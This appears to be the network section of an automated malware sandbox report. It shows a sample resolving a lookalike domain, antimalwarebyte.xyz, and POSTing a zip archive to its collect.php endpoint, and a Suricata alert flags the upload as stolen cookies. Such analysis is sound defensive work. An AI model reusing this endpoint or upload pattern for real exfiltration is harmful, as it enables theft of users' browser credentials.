Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
antimalwarebyte.xyz | 185.22.155.64 | |
UDP Requests

Source | Destination |
---|---|
192.168.56.102:57660 | 164.124.101.2:53 |
192.168.56.102:137 | 192.168.56.255:137 |
192.168.56.102:138 | 192.168.56.255:138 |
192.168.56.102:49152 | 239.255.255.250:3702 |
192.168.56.102:56752 | 239.255.255.250:1900 |
192.168.56.102:56754 | 239.255.255.250:3702 |
192.168.56.102:56756 | 239.255.255.250:3702 |
192.168.56.102:57661 | 239.255.255.250:3702 |
HTTP Requests

Method | Status | URL |
---|---|---|
POST | 200 | http://antimalwarebyte.xyz/collect.php |

Request headers:

```
POST /collect.php HTTP/1.1
Content-Type: multipart/form-data; boundary=SendFileZIPBoundary
User-Agent: uploader
Host: antimalwarebyte.xyz
Content-Length: 35555
Connection: Keep-Alive
Cache-Control: no-cache
```

Response headers:

```
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
content-length: 0
date: Fri, 02 Jul 2021 07:14:07 GMT
server: LiteSpeed
vary: User-Agent
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49807 -> 185.22.155.64:80 | 2027104 | ET HUNTING Suspicious Zipped Filename in Outbound POST Request (cookies.txt) M2 | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts